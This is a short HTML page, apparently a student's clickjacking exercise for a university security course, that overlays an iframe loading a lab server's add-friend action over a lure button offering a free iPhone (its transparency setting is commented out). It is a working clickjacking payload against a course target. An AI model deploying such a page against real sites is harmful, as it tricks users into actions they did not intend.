<html>
    <head>
        <title> CSEC380 Activity 3 </title>
        <style>
            iframe{
                width: 1000px;
                height: 500px;
                position: absolute;
                /* opacity: 0; */
                top: 0px;
                left: 0px;
                z-index: 1
            }
    
            button{
                font-size: 30px;
            }
        </style>
    </head>
    <body>
        <button type="button"> Click Here for a Free iPhone 13 Pro Max </button>
        <iframe src="http://csec380-core.csec.rit.edu:84/add_friend.php?id=15"></iframe>
    </body>
</html>